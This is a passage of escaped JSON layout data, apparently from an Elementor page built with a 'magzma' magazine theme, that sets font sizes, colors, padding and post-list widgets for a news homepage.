unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_s